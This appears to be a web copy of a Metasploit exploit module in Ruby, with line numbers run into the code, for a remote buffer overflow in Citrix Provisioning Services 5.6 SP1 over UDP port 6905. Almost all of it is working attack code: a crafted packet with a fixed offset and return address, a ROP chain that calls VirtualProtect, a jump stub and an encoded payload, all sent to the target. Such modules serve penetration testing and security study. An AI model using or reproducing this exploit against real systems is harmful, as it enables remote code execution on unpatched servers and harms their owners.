Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
Views: 11784
# -*- coding: binary -*-12##3# This module requires Metasploit: https://metasploit.com/download4# Current source: https://github.com/rapid7/metasploit-framework5##67class MetasploitModule < Msf::Exploit::Remote8Rank = NormalRanking910include Msf::Exploit::Remote::Udp1112def initialize(info = {})13super(update_info(info,14'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow',15'Description' => %q{16This module exploits a remote buffer overflow in the Citrix Provisioning Services175.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the186905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,19Windows 7, and Windows XP SP3.20},21'License' => MSF_LICENSE,22'Author' =>23[24'AbdulAziz Hariri', # Initial discovery via ZDI25'alino <26alino[at]gmail.com>' # Metasploit module26],27'References' =>28[29['OSVDB', '75780'],30['BID', '49803'],31['ZDI', '12-009'],32['URL', 'http://support.citrix.com/article/CTX130846']33],34'DefaultOptions' =>35{36'EXITFUNC' => 'process',37'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',38},39'Payload' =>40{41'BadChars' => "\x00",42'EncoderOptions' => {'BufferRegister'=>'ECX'},43},44'Platform' => ['win'],45'Targets' =>46[47[ 'Citrix Provisioning Services 5.6 SP1',48{49'Offset' => 2012,50'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe51}52]53],54'Privileged' => true,55'DisclosureDate' => '2011-11-04', #CTX130846 creation date56'DefaultTarget' => 0))5758register_options([Opt::RPORT(6905)])59end6061def exploit6263packet = "\x00\x00\x02\x40" # DATA MSG64packet << rand_text_alpha_upper(18)65packet << "\x00\x00\x00\x00" # Length66packet << rand_text_alpha_upper(target['Offset'])67packet << [target.ret].pack('V')6869rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe7071rop_gadgets =72[730x0045b141, # POP EAX; RETN streamprocess.exe740x1009a1bc, # VirtualProtect()750x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe760x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe770x004ad0cf, # POP EBP; RETN streamprocess.exe780x00455d9d, # PUSH ESP; RETN streamprocess.exe790x00497f5a, # POP EAX; RETN streamprocess.exe800xfffff9d0, # dwSize810x00447669, # NEG EAX; RETN streamprocess.exe820x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe830x00426305, # POP ECX; RETN streamprocess.exe840x00671fb9, # lpflOldProtect850x004e41e6, # POP EDI; RETN streamprocess.exe860x0040f004, # RETN streamprocess.exe870x00495c05, # POP EAX; RETN streamprocess.exe880xffffffc0, # flNewProtect890x0042c79a, # NEG EAX; RETN streamprocess.exe900x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe910x0045c1fa, # POP EAX; RETN streamprocess.exe920x90909090, # NOP930x00435bbe, # PUSHAD; RETN streamprocess.exe94].pack("V*")9596packet[258, rop_nop.length] = rop_nop97packet[410, rop_gadgets.length] = rop_gadgets98packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff"99packet[504, payload.encoded.length] = payload.encoded100101print_status("Trying target #{target.name}...")102103connect_udp104udp_sock.put(packet)105106handler107disconnect_udp108end109end110111112